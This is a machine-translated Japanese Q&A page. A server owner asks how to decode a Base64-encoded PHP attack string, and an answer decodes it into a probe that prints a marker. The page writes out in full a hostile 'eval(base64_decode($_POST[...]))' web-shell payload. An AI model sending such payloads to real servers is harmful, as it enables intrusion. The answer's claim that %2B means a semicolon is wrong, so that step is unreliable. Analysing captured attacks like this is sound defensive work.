web-dev-qa-db-ja.com

これをデコードするのに役立ちますか? Base64攻撃

この攻撃を解読しようとしています。何らかの悪意のあるコマンドをWebサーバーに送信しようとしていることはわかっていますが、それをデコードする方法がわかりません。何度かエンコードされているようなものです。知りません。見回してみましたが見つかりません。

a = @はeval(BASE64_DECODE($ _ POST [Z0]));&Z0 = QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0%2BfCIpOztwcmludCgiaGFvcmVuZ2UuY29tUVEzMTcyNzU3MzgiKTs7ZWNobygifDwtIik7ZGllKCk7

1
Neo Son

まずURLデコードする必要があります。真ん中にキャラクターがいる%2B あれは ;

チェック this アウト。

QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0%2BfCIpOztwcmludCgiaGFvcmVuZ2UuY29tUVEzMTcyNzU3MzgiKTs7ZWNobygifDwtIik7ZGllKCk7

になる

@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;print("haorenge.comQQ317275738");;echo("|<-");die();
1
MikeSchem